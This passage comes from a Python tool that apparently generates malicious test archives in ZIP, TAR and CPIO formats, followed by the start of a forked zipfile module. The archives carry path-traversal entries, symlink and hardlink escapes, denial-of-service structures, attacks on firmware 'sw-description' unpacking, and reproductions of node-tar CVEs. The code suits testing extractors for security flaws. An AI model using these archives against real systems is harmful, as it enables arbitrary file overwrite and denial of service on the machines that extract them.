OSError as e: 645 | raise UnsupportedException(e) 646 | elif type == 1: 647 | try: 648 | os.mkdir(name_to_use) 649 | except OSError as e: 650 | raise UnsupportedException(e) 651 | elif type == 2: 652 | if "\x00" in to_name: 653 | raise UnsupportedException("Embedded null bytes not supported in CPIO symlink target") 654 | try: 655 | os.symlink(to_name, name_to_use) 656 | except OSError as e: 657 | raise UnsupportedException(e) 658 | self._add_list_of_existing_components((name_to_use,)) 659 | if type == 0: 660 | os.remove(name_to_use) 661 | elif type == 1: 662 | os.removedirs(name_to_use) 663 | elif type == 2: 664 | os.remove(name_to_use) 665 | if name != name_to_use: 666 | with open(self.get_output_path(), "rb") as f: 667 | cpio_content = f.read() 668 | with open(self.get_output_path(), "wb") as f: 669 | count = cpio_content.count(name_to_use.encode()) 670 | if count == 0: 671 | #print(f"ERROR: Couldn't find the file {name_to_use} we just put into the CPIO {self.format} file {self.output_path}") 672 | shutil.copyfile("/tmp/cpio-file-tmp.cpio", self.output_path) 673 | errors += "{name_to_use} not in file. " 674 | elif count == 1: 675 | cpio_content = cpio_content.replace(name_to_use.encode(), name.encode()) 676 | f.write(cpio_content) 677 | repeat = 99 # we do not need to replace or repeat, as it worked as expected 678 | #print(f"Success: {name_to_use} we just put into the CPIO {self.format} file {self.output_path} was renamed to {name}") 679 | success = True 680 | else: 681 | #print(f"ERROR: There is more than once the string {name_to_use} in the CPIO {self.format} file {self.output_path}") 682 | shutil.copyfile("/tmp/cpio-file-tmp.cpio", self.output_path) 683 | errors += "More than one {name_to_use} in file. " 684 | if not success: 685 | raise UnsupportedException(f"Tried 5 times to include name {name_to_use} as a replacement for {name} in the CPIO {self.format} file {self.output_path} but that didn't work. Errors were: {errors}") 686 | 687 | 688 | def _add_list_of_existing_components(self, file_list): 689 | stdin_input = "\n".join(file_list).encode() 690 | cmd = self._get_command() 691 | p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.STDOUT) 692 | stdout = p.communicate(input=stdin_input)[0] 693 | #print(stdout.decode()) 694 | def get_output_filename_addition(self): 695 | addition = f"{self.attack_name}_{self.format}" 696 | return addition #+ "_" + str(random.randint(10000, 99999)) 697 | def get_output_path(self, no_extension=False): 698 | path = f"../{OUTPUT_DIR}/{CustomCpioArchive.FILETYPE}/{self.format}/{OUTPUT_FILE_PREFIX}" + self.get_output_filename_addition() 699 | if no_extension: 700 | return path 701 | else: 702 | return path + "." + CustomCpioArchive.FILETYPE 703 | 704 | def add_cwd_content(self): 705 | file_list = [] 706 | add_cwd_to_archive(file_list.append) 707 | self._add_list_of_existing_components(file_list) 708 | self.info_out_file.write(f"- All files from {INPUT_FOLDER} were packed into this archive\n") 709 | 710 | def add_dummy_at_path(self, _, payload_path, is_file=True): 711 | #payload_path = payload_path if payload_path.endswith("/") else payload_path + "/" 712 | dir_or_file = "file" if is_file else "dir" 713 | if "\x00" in payload_path: 714 | raise UnsupportedException("Zero bytes in payloads are not supported by the CPIO toolchain") 715 | else: 716 | if USE_PAYLOAD_DEFAULT_NAME: 717 | self._add_nonexisting_circumvent_filtering(payload_path + PAYLOAD_DEFAULT_NAME, 0 if is_file else 1) 718 | self.info_out_file.write(f"- Added {dir_or_file} at {payload_path + PAYLOAD_DEFAULT_NAME}\n") 719 | else: 720 | filename_in_archive = payload_path + self.get_output_filename_addition() + "_" + CustomCpioArchive.FILETYPE 721 | self._add_nonexisting_circumvent_filtering(filename_in_archive, 0 if is_file else 1) 722 | self.info_out_file.write(f"- Added {dir_or_file} at {filename_in_archive}\n") 723 | 724 | def add_file(self, file_path, content): 725 | try: 726 | os.remove("../tmp_file2") 727 | except FileNotFoundError: 728 | pass 729 | with open("../tmp_file2", "w") as f: 730 | f.write(content) 731 | self._add_nonexisting_circumvent_filtering(file_path, 0, content=content) 732 | self.info_out_file.write(f"- Added file at {file_path} with content {content[:10]}...\n") 733 | 734 | def add_dir(self, dir_path): 735 | self._add_nonexisting_circumvent_filtering(dir_path, 1) 736 | self.info_out_file.write(f"- Added dir at {dir_path}\n") 737 | 738 | def add_symlink(self, from_name, to_name): 739 | self._add_nonexisting_circumvent_filtering(from_name, 2, to_name=to_name) 740 | self.info_out_file.write(f"- Added symlink pointing from {from_name} to {to_name}\n") 741 | 742 | def add_hardlink(self, from_name, to_name): 743 | # TODO 744 | raise UnsupportedException("Hardlinks not supported for cpio files") 745 | 746 | def close(self): 747 | self.info_out_file.close() 748 | 749 | 750 | class ZipVariationCreator: 751 | def create(self, attack_name): 752 | for compression, compress_levels in ZIP_CONFIG: 753 | for compress_level in compress_levels: 754 | try: 755 | yield CustomZipArchive(attack_name, compression, compress_level) 756 | except FileAlreadyExistsException: 757 | Logger.info(f"File already exists, not creating ZIP {attack_name}, {compression}, {compress_level}") 758 | 759 | class TarVariationCreator: 760 | def create(self, attack_name): 761 | for compression_file_ext, compression in TAR_COMPRESSION_CONFIG: 762 | for format, encodings in TAR_CONFIG: 763 | for encoding in encodings: 764 | for error in TAR_ERRORS_CONFIG: 765 | try: 766 | yield CustomTarArchive(attack_name, compression_file_ext, compression, format, encoding, error) 767 | except FileAlreadyExistsException: 768 | Logger.info(f"File already exists, not creating TAR {attack_name}, {compression_file_ext}, {compression}, {format}, {encoding}, {error}") 769 | class CpioVariationCreator: 770 | def __init__(self, gnu_cpio_binary): 771 | self.gnu_cpio_binary = gnu_cpio_binary 772 | 773 | def create(self, attack_name): 774 | for format in CPIO_CONFIG: 775 | try: 776 | yield CustomCpioArchive(self.gnu_cpio_binary, attack_name, format) 777 | except FileAlreadyExistsException: 778 | Logger.info(f"File already exists, not creating CPIO {attack_name}, {format}") 779 | 780 | 781 | def main(): 782 | 783 | with open("tmp_file", "w") as f: 784 | f.write(FILE_CONTENT) 785 | 786 | if not os.path.exists("tmp_dir"): 787 | os.mkdir("tmp_dir") 788 | 789 | if not os.path.exists(OUTPUT_DIR): 790 | os.mkdir(OUTPUT_DIR) 791 | if not os.path.exists(f"{OUTPUT_DIR}/zip"): 792 | os.mkdir(f"{OUTPUT_DIR}/zip") 793 | for name in CustomZipArchive.NAMES_COMPRESSION.values(): 794 | os.mkdir(f"{OUTPUT_DIR}/zip/{name}") 795 | if not os.path.exists(f"{OUTPUT_DIR}/tar"): 796 | os.mkdir(f"{OUTPUT_DIR}/tar") 797 | os.mkdir(f"{OUTPUT_DIR}/tar/ustar") 798 | os.mkdir(f"{OUTPUT_DIR}/tar/gnu") 799 | os.mkdir(f"{OUTPUT_DIR}/tar/pax") 800 | if not os.path.exists(f"{OUTPUT_DIR}/tar.gz"): 801 | os.mkdir(f"{OUTPUT_DIR}/tar.gz") 802 | os.mkdir(f"{OUTPUT_DIR}/tar.gz/ustar") 803 | os.mkdir(f"{OUTPUT_DIR}/tar.gz/gnu") 804 | os.mkdir(f"{OUTPUT_DIR}/tar.gz/pax") 805 | if not os.path.exists(f"{OUTPUT_DIR}/tar.bz2"): 806 | os.mkdir(f"{OUTPUT_DIR}/tar.bz2") 807 | os.mkdir(f"{OUTPUT_DIR}/tar.bz2/ustar") 808 | os.mkdir(f"{OUTPUT_DIR}/tar.bz2/gnu") 809 | os.mkdir(f"{OUTPUT_DIR}/tar.bz2/pax") 810 | if not os.path.exists(f"{OUTPUT_DIR}/cpio"): 811 | os.mkdir(f"{OUTPUT_DIR}/cpio") 812 | for format in CPIO_CONFIG: 813 | os.mkdir(f"{OUTPUT_DIR}/cpio/{format}") 814 | 815 | os.chdir(INPUT_FOLDER) 816 | 817 | gnu_cpio_binary = "cpio" 818 | output = subprocess.check_output([gnu_cpio_binary, '--version']).decode() 819 | if "GNU cpio" in output: 820 | Logger.info("Good, your 'cpio' command is GNU cpio") 821 | else: 822 | # Use MacOS compiled binary 823 | gnu_cpio_binary = "../cpio-2.14-darwin" 824 | output = subprocess.check_output([gnu_cpio_binary, '--version']).decode() 825 | if not "GNU cpio" in output: 826 | Logger.info("Unfortunately we couldn't find a GNU cpio binary on your system. Please install GNU cpio.") 827 | return 828 | 829 | Logger.info(f"fyi, if you want to create .jar files, put a META-INF folder into {INPUT_FOLDER} and rename all .zip to .jar") 830 | Logger.info(f"The script will on-error print the exception (if a file can't be created) and then delete the corresponding archive file") 831 | Logger.info(f"Not printing any compatiblity issues with tar ustar format, as it is very limited in path length") 832 | Logger.info("Starting to generate files...") 833 | 834 | payloads_already = set() 835 | for name, payload, start, depths in PATH_TRAVERSAL_ATTACKS: 836 | for depth in depths: 837 | payload_path = start + payload * depth 838 | attack_name = f"{name}_{depth}" 839 | if payload_path in payloads_already: 840 | Logger.info(f"Warning, {payload_path} would be created twice, ignoring duplicate...") 841 | continue 842 | else: 843 | payloads_already.add(payload_path) 844 | ### 845 | # plain attacks in PATH_TRAVERSAL_ATTACKS 846 | ### 847 | for creator in ( 848 | ZipVariationCreator(), 849 | TarVariationCreator(), 850 | CpioVariationCreator(gnu_cpio_binary), 851 | ): 852 | for archive in creator.create(attack_name): 853 | try: 854 | archive.add_cwd_content() 855 | archive.add_dummy_file_at_path(payload_path) 856 | archive.close() 857 | except UnsupportedException as e: 858 | Logger.info(e) if not 'ustar' in str(e) else "" 859 | archive.close_and_remove() 860 | ### 861 | # tar.gz attack by attacking the included tar-name with PATH_TRAVERSAL_ATTACKS 862 | ### 863 | compression_file_ext = ".tar.gz" 864 | compression = "gz" 865 | attack_name = "tar_name_in_gz_" + attack_name 866 | for format, encodings in TAR_CONFIG: 867 | for encoding in encodings: 868 | for error in TAR_ERRORS_CONFIG: 869 | try: 870 | archive = CustomTarArchive(attack_name, compression_file_ext, compression, format, encoding, error, gz_tar_name=payload_path) 871 | except FileAlreadyExistsException: 872 | Logger.info(f"File already exists, not creating TAR {attack_name}, {compression_file_ext}, {compression}, {format}, {encoding}, {error}") 873 | continue 874 | archive.add_cwd_content() 875 | archive.close() 876 | 877 | ### 878 | # (hard/sym)link attacks for LINK_ATTACKS 879 | ### 880 | for link_type in ("hard", "soft"): 881 | for attack_name, to_name_file_path in LINK_ATTACKS: 882 | for creator in ( 883 | ZipVariationCreator(), 884 | TarVariationCreator(), 885 | CpioVariationCreator(gnu_cpio_binary), 886 | ): 887 | for archive in creator.create(link_type + attack_name): 888 | try: 889 | archive.add_cwd_content() 890 | if link_type == "hard": 891 | from_name = archive.add_dummy_hardlink_to_path(to_name_file_path) 892 | else: 893 | from_name = archive.add_dummy_symlink_to_path(to_name_file_path) 894 | # To make it more interesting, now that we have a link from_name -> to_name_file_path, 895 | # try to write to from_name/D 896 | archive.add_dummy_file_at_path(from_name + "/") 897 | archive.close() 898 | except UnsupportedException as e: 899 | Logger.info(e) if not 'ustar' in str(e) else "" 900 | archive.close_and_remove() 901 | 902 | ### 903 | # Hand crafted stuff 904 | ### 905 | 906 | for creator in ( 907 | ZipVariationCreator(), 908 | TarVariationCreator(), 909 | CpioVariationCreator(gnu_cpio_binary), 910 | ): 911 | attack_name = "dos_500_deep_dir" 912 | for archive in creator.create(attack_name): 913 | try: 914 | archive.add_cwd_content() 915 | archive.add_dummy_file_at_path("G/" * 500) 916 | archive.close() 917 | except UnsupportedException as e: 918 | Logger.info(e) if not 'ustar' in str(e) else "" 919 | archive.close_and_remove() 920 | 921 | attack_name = "dos_self_symlink" 922 | for archive in creator.create(attack_name): 923 | try: 924 | archive.add_cwd_content() 925 | archive.add_symlink("K", "K") 926 | archive.close() 927 | except UnsupportedException as e: 928 | Logger.info(e) if not 'ustar' in str(e) else "" 929 | archive.close_and_remove() 930 | 931 | attack_name = "dos_circle_symlink" 932 | for archive in creator.create(attack_name): 933 | try: 934 | archive.add_cwd_content() 935 | archive.add_symlink("L", "M") 936 | archive.add_symlink("M", "L") 937 | archive.close() 938 | except UnsupportedException as e: 939 | Logger.info(e) if not 'ustar' in str(e) else "" 940 | archive.close_and_remove() 941 | 942 | attack_name = "unpack_sw-description-symlink" 943 | for archive in creator.create(attack_name): 944 | try: 945 | archive.add_cwd_content() 946 | # If the attacked system only unpacks one file, but doesn't think that it could be a folder 947 | archive.add_dir("sw-description") 948 | archive.add_dummy_file_at_path("sw-description/") 949 | archive.add_symlink("sw-description/A", "A") 950 | archive.add_dummy_file_at_path("sw-description/A/") 951 | archive.close() 952 | except UnsupportedException as e: 953 | Logger.info(e) if not 'ustar' in str(e) else "" 954 | archive.close_and_remove() 955 | 956 | attack_name = "unpack_sw-description-path_traversal_1" 957 | for archive in creator.create(attack_name): 958 | try: 959 | archive.add_cwd_content() 960 | # If the attacked system only unpacks one file, but doesn't think that it could be a folder with path traversal inside 961 | archive.add_dir("sw-description") 962 | archive.add_dummy_file_at_path("sw-description/../../") 963 | archive.close() 964 | except UnsupportedException as e: 965 | Logger.info(e) if not 'ustar' in str(e) else "" 966 | archive.close_and_remove() 967 | 968 | attack_name = "unpack_sw-description-path_traversal_2" 969 | for archive in creator.create(attack_name): 970 | try: 971 | archive.add_cwd_content() 972 | # If the attacked system only unpacks one file, but doesn't think that it could be a path traversal folder 973 | archive.add_dummy_file_at_path("sw-description/../../") 974 | archive.close() 975 | except UnsupportedException as e: 976 | Logger.info(e) if not 'ustar' in str(e) else "" 977 | archive.close_and_remove() 978 | 979 | attack_name = "unpack_sw-description-path_traversal_3" 980 | for archive in creator.create(attack_name): 981 | try: 982 | archive.add_cwd_content() 983 | # If the attacked system only unpacks one file, but doesn't think that it could be located somewhere else 984 | archive.add_file("../../../../sw-description", FILE_CONTENT) 985 | archive.close() 986 | except UnsupportedException as e: 987 | Logger.info(e) if not 'ustar' in str(e) else "" 988 | archive.close_and_remove() 989 | 990 | attack_name = "unpack_sw-description-path_traversal_4" 991 | for archive in creator.create(attack_name): 992 | try: 993 | archive.add_cwd_content() 994 | # If the attacked system only unpacks one file, but doesn't think that it could have multiple entries in the archive with that name 995 | archive.add_symlink("sw-description", "/") 996 | archive.add_dir("sw-description") 997 | archive.add_file("sw-description", FILE_CONTENT) 998 | archive.close() 999 | except UnsupportedException as e: 1000 | Logger.info(e) if not 'ustar' in str(e) else "" 1001 | archive.close_and_remove() 1002 | 1003 | attack_name = "unpack_sw-description-hardlink" 1004 | for archive in creator.create(attack_name): 1005 | try: 1006 | archive.add_cwd_content() 1007 | # If the attacked system only unpacks one file, but doesn't think that it could be a folder 1008 | archive.add_dir("sw-description") 1009 | archive.add_dummy_file_at_path("sw-description/") 1010 | archive.add_hardlink("sw-description/A", "A") 1011 | archive.add_dummy_file_at_path("sw-description/A/") 1012 | archive.close() 1013 | except UnsupportedException as e: 1014 | Logger.info(e) if not 'ustar' in str(e) else "" 1015 | archive.close_and_remove() 1016 | 1017 | # Clashing unicode normalization names 1018 | # TODO: unclear if correctly understood https://github.com/isaacs/node-tar/security/advisories/GHSA-qq89-hq3f-393p 1019 | attack_name = "CVE-2021-37712" 1020 | for archive in creator.create(attack_name): 1021 | try: 1022 | archive.add_cwd_content() 1023 | # H h ʜ Η Н һ Ꮋ Ｈｈ 1024 | # A specially crafted tar archive could thus include directories with two forms of the path that 1025 | # resolve to the same file system entity ... 1026 | archive.add_dir("ｈ") 1027 | archive.add_dir("һ") 1028 | # ... followed by a symbolic link with a name in the first form ... 1029 | archive.add_symlink("ｈ", "../") 1030 | # ... lastly followed by a file using the second form ... 1031 | archive.add_file("һ", FILE_CONTENT) 1032 | # ... It led to bypassing node-tar symlink checks on directories, essentially allowing an untrusted tar 1033 | # file to symlink into an arbitrary location and subsequently extracting arbitrary files into that 1034 | # location, thus allowing arbitrary file creation and overwrite. 1035 | archive.add_dummy_file_at_path("ｈ/") 1036 | archive.add_dummy_file_at_path("һ/") 1037 | archive.close() 1038 | except UnsupportedException as e: 1039 | Logger.info(e) if not 'ustar' in str(e) else "" 1040 | archive.close_and_remove() 1041 | 1042 | # Clashing unicode normalization names 1043 | #TODO: unclear if correctly understood https://github.com/isaacs/node-tar/security/advisories/GHSA-9r2w-394v-53qc 1044 | attack_name = "CVE-2021-37701_1" 1045 | for archive in creator.create(attack_name): 1046 | try: 1047 | archive.add_cwd_content() 1048 | # This logic was insufficient when extracting tar files that contained both a directory and a symlink 1049 | # with the same name as the directory, where the symlink and directory names in the archive entry 1050 | # used backslashes as a path separator on posix systems 1051 | archive.add_dir("I") 1052 | archive.add_dir("I\\J") 1053 | archive.add_symlink("I\\J", "../") 1054 | archive.add_dummy_file_at_path("I\\J\\") 1055 | archive.close() 1056 | except UnsupportedException as e: 1057 | Logger.info(e) if not 'ustar' in str(e) else "" 1058 | archive.close_and_remove() 1059 | 1060 | # Clashing unicode normalization names 1061 | #TODO: unclear if correctly understood https://github.com/isaacs/node-tar/security/advisories/GHSA-9r2w-394v-53qc 1062 | attack_name = "CVE-2021-37701_2" 1063 | for archive in creator.create(attack_name): 1064 | try: 1065 | archive.add_cwd_content() 1066 | # Additionally, a similar confusion could arise on case-insensitive filesystems. If a tar archive contained a directory at FOO, followed by a 1067 | # symbolic link named foo, then on case-insensitive file systems, the creation of the symbolic link would remove the directory from the 1068 | # filesystem, but not from the internal directory cache, as it would not be treated as a cache hit. A subsequent file entry within 1069 | # the FOO directory would then be placed in the target of the symbolic link, thinking that the directory had already been created. 1070 | archive.add_dir("K") 1071 | archive.add_symlink("k", "../") 1072 | archive.add_dummy_file_at_path("K/") 1073 | archive.add_dummy_file_at_path("k/") 1074 | archive.close() 1075 | except UnsupportedException as e: 1076 | Logger.info(e) if not 'ustar' in str(e) else "" 1077 | archive.close_and_remove() 1078 | 1079 | # Clashing unicode normalization names 1080 | #TODO: unclear if correctly understood https://github.com/isaacs/node-tar/security/advisories/GHSA-r628-mhmh-qjhw 1081 | attack_name = "CVE-2021-32803" 1082 | for archive in creator.create(attack_name): 1083 | try: 1084 | archive.add_cwd_content() 1085 | # This logic was insufficient when extracting tar files that contained both a directory and a symlink with the same name as the directory. 1086 | # This order of operations resulted in the directory being created and added to the node-tar directory cache. When a directory is 1087 | # present in the directory cache, subsequent calls to mkdir for that directory are skipped. However, this is also where node-tar 1088 | # checks for symlinks occur. 1089 | archive.add_dir("L") 1090 | archive.add_symlink("L", "../") 1091 | archive.add_dummy_file_at_path("L/") 1092 | archive.close() 1093 | except UnsupportedException as e: 1094 | Logger.info(e) if not 'ustar' in str(e) else "" 1095 | archive.close_and_remove() 1096 | 1097 | # Maximum Windows path length according to 1098 | # https://learn.microsoft.com/en-us/windows/win32/fileio/maximum-file-path-limitation?tabs=registry 1099 | attack_name = "windows_maxlength_1" 1100 | for archive in creator.create(attack_name): 1101 | try: 1102 | archive.add_cwd_content() 1103 | archive.add_dir("C:\\" + "A" * 256) 1104 | # should cut away 1 character of PAYLOAD_DEFAULT_NAME 1105 | archive.add_file("C:\\" + "A" * (255 - len(PAYLOAD_DEFAULT_NAME) + 1) + f"/{PAYLOAD_DEFAULT_NAME}", 1106 | FILE_CONTENT) 1107 | archive.close() 1108 | except UnsupportedException as e: 1109 | Logger.info(e) if not 'ustar' in str(e) else "" 1110 | archive.close_and_remove() 1111 | 1112 | os.remove("../tmp_file") 1113 | try: 1114 | os.remove("../tmp_file2") 1115 | except FileNotFoundError: 1116 | pass 1117 | #Logger.info("Cleaning up duplicates in output folder") 1118 | DirectoryCleaner.delete_duplicates_recursively(f"../{OUTPUT_DIR}/", use_disc=False, dry_run=False) 1119 | 1120 | class Logger: 1121 | @staticmethod 1122 | def info(*text): 1123 | import datetime 1124 | print("[+ " + str(datetime.datetime.now()) + "] "+str(" ".join(str(i) for i in text))) 1125 | 1126 | class DirectoryCleaner: 1127 | #filesizes dict can get pretty huge, so I ran out of memory before 1128 | #so let's just put it on disc. Make sure you have enough space 1129 | #in the mounted location. I had to replace the tmpfs on small embedded devices: 1130 | #mkdir /mnt/external-usb/tmpfs-dir 1131 | #umount /tmp 1132 | #ln -s /mnt/external-usb/tmpfs-dir/ /tmp 1133 | #Or simply use a location where you have enough space 1134 | filesizes_file = '/tmp/filesizes' 1135 | 1136 | @staticmethod 1137 | def find_duplicate_contents(rootdir, use_disc=False): 1138 | import hashlib 1139 | """Find duplicate files in directory tree.""" 1140 | if use_disc: 1141 | #filesizes can get pretty huge, so I ran out of memory before 1142 | #so let's just put it on disc. Make sure you have enough space 1143 | #in the mounted location. I had to replace the tmpfs 1144 | #mkdir /mnt/external-usb/tmpfs-dir 1145 | #umount /tmp 1146 | #ln -s /mnt/external-usb/tmpfs-dir/ /tmp 1147 | #Or simply use a location where you have enough space! 1148 | import shelve 1149 | if os.path.isfile(DirectoryCleaner.filesizes_file): 1150 | os.remove(DirectoryCleaner.filesizes_file) 1151 | filesizes = shelve.open(DirectoryCleaner.filesizes_file) 1152 | else: 1153 | filesizes = {} 1154 | #Logger.info("Building up dict with key as filesize and value is list of filenames...") 1155 | for path, _, files in os.walk(rootdir): 1156 | for filename in files: 1157 | filepath = os.path.join(path, filename) 1158 | filesize = os.stat(filepath).st_size 1159 | #works with both, dict and shelve: 1160 | k = filesizes.setdefault(str(filesize), set()) 1161 | k.add(filepath) 1162 | # We are only interested in lists with more than one entry, 1163 | # meaning a file can not have the same content if it has a 1164 | # different size 1165 | #Logger.info("Checking lists with more than one file...") 1166 | lists_longer_than_one = [ flist for flist in filesizes.values() if len(flist)>1 ] 1167 | #Logger.info("Checking " + str(len(lists_longer_than_one)) + " lists with more than one file...") 1168 | i = 0 1169 | for files in lists_longer_than_one: 1170 | i += 1 1171 | if i % 10000 == 0: 1172 | Logger.info("Done " + str(i) + " lists...") 1173 | if len(files) >= 10000: 1174 | Logger.info("Found a list with " + str(len(files)) + " entries, will need to read that many files and calculate their hashes...") 1175 | unique = set() 1176 | for filepath in files: 1177 | if os.path.isfile(filepath): 1178 | with open(filepath, "rb") as openfile: 1179 | # We are not interested in cryptographic strength, so let's use md5 here instead of sha256: 1180 | filehash = hashlib.md5(openfile.read()).digest() 1181 | if filehash not in unique: 1182 | unique.add(filehash) 1183 | else: 1184 | yield filepath 1185 | if use_disc and os.path.isfile(DirectoryCleaner.filesizes_file): 1186 | os.remove(DirectoryCleaner.filesizes_file) 1187 | 1188 | @staticmethod 1189 | def delete_duplicates_recursively(search_dir, use_disc=False, dry_run=True): 1190 | Logger.info("Removing duplicates in", search_dir) 1191 | i = 0 1192 | for duplicate in DirectoryCleaner.find_duplicate_contents(search_dir, use_disc=use_disc): 1193 | if dry_run: 1194 | Logger.info("[DRY-RUN] Deleting the duplicate file:", duplicate) 1195 | i += 1 1196 | else: 1197 | #Logger.info("Deleting the duplicate file:", duplicate) 1198 | i += 1 1199 | os.remove(duplicate) 1200 | # Also remove .txt file next to it 1201 | filepath, filename = os.path.split(duplicate) 1202 | txt_file = filepath + "/" + filename.split(".")[0] + ".txt" 1203 | if os.path.exists(txt_file): 1204 | os.remove(txt_file) 1205 | 1206 | Logger.info(f"Deleted {i} duplicates in", search_dir) 1207 | 1208 | if __name__ == "__main__": 1209 | main() 1210 | -------------------------------------------------------------------------------- /fipfile/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Read and write ZIP files. 3 | 4 | XXX references to utf-8 need further investigation. 5 | """ 6 | import binascii 7 | import importlib.util 8 | import io 9 | import os 10 | import shutil 11 | import stat 12 | import struct 13 | import sys 14 | import threading 15 | import time 16 | 17 | try: 18 | import zlib # We may need its compression method 19 | crc32 = zlib.crc32 20 | except ImportError: 21 | zlib = None 22 | crc32 = binascii.crc32 23 | 24 | try: 25 | import bz2 # We may need its compression method 26 | except ImportError: 27 | bz2 = None 28 | 29 | try: 30 | import lzma # We may need its compression method 31 | except ImportError: 32 | lzma = None 33 | 34 | __all__ = ["BadZipFile", "BadZipfile", "error", 35 | "ZIP_STORED", "ZIP_DEFLATED", "ZIP_BZIP2", "ZIP_LZMA", 36 | "is_zipfile", "ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile", 37 | "Path"] 38 | 39 | class BadZipFile(Exception): 40 | pass 41 | 42 | 43 | class LargeZipFile(Exception): 44 | """ 45 | Raised when writing a zipfile, the zipfile requires ZIP64 extensions 46 | and those extensions are disabled. 47 | """ 48 | 49 | error = BadZipfile = BadZipFile # Pre-3.2 compatibility names 50 | 51 | 52 | ZIP64_LIMIT = (1 << 31) - 1 53 | ZIP_FILECOUNT_LIMIT = (1 << 16) - 1 54 | ZIP_MAX_COMMENT = (1 << 16) - 1 55 | 56 | # constants for Zip file compression methods 57 | ZIP_STORED = 0 58 | ZIP_DEFLATED = 8 59 | ZIP_BZIP2 = 12 60 | ZIP_LZMA = 14 61 | # Other ZIP compression methods not supported 62 | 63 | DEFAULT_VERSION = 20 64 | ZIP64_VERSION = 45 65 | BZIP2_VERSION = 46 66 | LZMA_VERSION = 63 67 | # we recognize (but not necessarily support) all features up to that version 68 | MAX_EXTRACT_VERSION = 63 69 | 70 | # Below are some formats and associated data for reading/writing headers using 71 | # the struct module. The names and structures of headers/records are those used 72 | # in the PKWARE description of the ZIP file format: 73 | # http://www.pkware.com/documents/casestudies/APPNOTE.TXT 74 | # (URL valid as of January 2008) 75 | 76 | # The "end of central directory" structure, magic number, size, and indices 77 | # (section V.I in the format document) 78 | structEndArchive = b"<4s4H2LH" 79 | stringEndArchive = b"PK\005\006" 80 | sizeEndCentDir = struct.calcsize(structEndArchive) 81 | 82 | _ECD_SIGNATURE = 0 83 | _ECD_DISK_NUMBER = 1 84 | _ECD_DISK_START = 2 85 | _ECD_ENTRIES_THIS_DISK = 3 86 | _ECD_ENTRIES_TOTAL = 4 87 | _ECD_SIZE = 5 88 | _ECD_OFFSET = 6 89 | _ECD_COMMENT_SIZE = 7 90 | # These last two indices are not part of the structure as defined in the 91 | # spec, but they are used internally by this module as a convenience 92 | _ECD_COMMENT = 8 93 | _ECD_LOCATION = 9 94 | 95 | # The "central directory" structure, magic number, size, and indices 96 | # of entries in the structure (section V.F in the format document) 97 | structCentralDir = "<4s4B4HL2L5H2L" 98 | stringCentralDir = b"PK\001\002" 99 | sizeCentralDir = struct.calcsize(structCentralDir) 100 | 101 | # indexes of entries in the central directory structure 102 | _CD_SIGNATURE = 0 103 | _CD_CREATE_VERSION = 1 104 | _CD_CREATE_SYSTEM = 2 105 | _CD_EXTRACT_VERSION = 3 106 | _CD_EXTRACT_SYSTEM = 4 107 | _CD_FLAG_BITS = 5 108 | _CD_COMPRESS_TYPE = 6 109 | _CD_TIME = 7 110 | _CD_DATE = 8 111 | _CD_CRC = 9 112 | _CD_COMPRESSED_SIZE = 10 113 | _CD_UNCOMPRESSED_SIZE = 11 114 | _CD_FILENAME_LENGTH = 12 115 | _CD_EXTRA_FIELD_LENGTH = 13 116 | _CD_COMMENT_LENGTH = 14 117 | _CD_DISK_NUMBER_START = 15 118 | _CD_INTERNAL_FILE_ATTRIBUTES = 16 119 | _CD_EXTERNAL_FILE_ATTRIBUTES = 17 120 | _CD_LOCAL_HEADER_OFFSET = 18 121 | 122 | # General purpose bit flags 123 | # Zip Appnote: 4.4.4 general purpose bit flag: (2 bytes) 124 | _MASK_ENCRYPTED = 1 << 0 125 | # Bits 1 and 2 have different meanings depending on the compression used. 126 | _MASK_COMPRESS_OPTION_1 = 1 << 1 127 | # _MASK_COMPRESS_OPTION_2 = 1 << 2 128 | # _MASK_USE_DATA_DESCRIPTOR: If set, crc-32, compressed size and uncompressed 129 | # size are zero in the local header and the real values are written in the data 130 | # descriptor immediately following the compressed data. 131 | _MASK_USE_DATA_DESCRIPTOR = 1 << 3 132 | # Bit 4: Reserved for use with compression method 8, for enhanced deflating. 133 | # _MASK_RESERVED_BIT_4 = 1 << 4 134 | _MASK_COMPRESSED_PATCH = 1 << 5 135 | _MASK_STRONG_ENCRYPTION = 1 << 6 136 | # _MASK_UNUSED_BIT_7 = 1 << 7 137 | # _MASK_UNUSED_BIT_8 = 1 << 8 138 | # _MASK_UNUSED_BIT_9 = 1 << 9 139 | # _MASK_UNUSED_BIT_10 = 1 << 10 140 | _MASK_UTF_FILENAME = 1 << 11 141 | # Bit 12: Reserved by PKWARE for enhanced compression. 142 | # _MASK_RESERVED_BIT_12 = 1 << 12 143 | # _MASK_ENCRYPTED_CENTRAL_DIR = 1 << 13 144 | # Bit 14, 15: Reserved by PKWARE 145 | # _MASK_RESERVED_BIT_14 = 1 << 14 146 | # _MASK_RESERVED_BIT_15 = 1 << 15 147 | 148 | # The "local file header" structure, magic number, size, and indices 149 | # (section V.A in the format document) 150 | structFileHeader = "<4s2B4HL2L2H" 151 | stringFileHeader = b"PK\003\004" 152 | sizeFileHeader = struct.calcsize(structFileHeader) 153 | 154 | _FH_SIGNATURE = 0 155 | _FH_EXTRACT_VERSION = 1 156 | _FH_EXTRACT_SYSTEM = 2 157 | _FH_GENERAL_PURPOSE_FLAG_BITS = 3 158 | _FH_COMPRESSION_METHOD = 4 159 | _FH_LAST_MOD_TIME = 5 160 | _FH_LAST_MOD_DATE = 6 161 | _FH_CRC = 7 162 | _FH_COMPRESSED_SIZE = 8 163 | _FH_UNCOMPRESSED_SIZE = 9 164 | _FH_FILENAME_LENGTH = 10 165 | _FH_EXTRA_FIELD_LENGTH = 11 166 | 167 | # The "Zip64 end of central directory locator" structure, magic number, and size 168 | structEndArchive64Locator = "<4sLQL" 169 | stringEndArchive64Locator = b"PK\x06\x07" 170 | sizeEndCentDir64Locator = struct.calcsize(structEndArchive64Locator) 171 | 172 | # The "Zip64 end of central directory" record, magic number, size, and indices 173 | # (section V.G in the format document) 174 | structEndArchive64 = "<4sQ2H2L4Q" 175 | stringEndArchive64 = b"PK\x06\x06" 176 | sizeEndCentDir64 = struct.calcsize(structEndArchive64) 177 | 178 | _CD64_SIGNATURE = 0 179 | _CD64_DIRECTORY_RECSIZE = 1 180 | _CD64_CREATE_VERSION = 2 181 | _CD64_EXTRACT_VERSION = 3 182 | _CD64_DISK_NUMBER = 4 183 | _CD64_DISK_NUMBER_START = 5 184 | 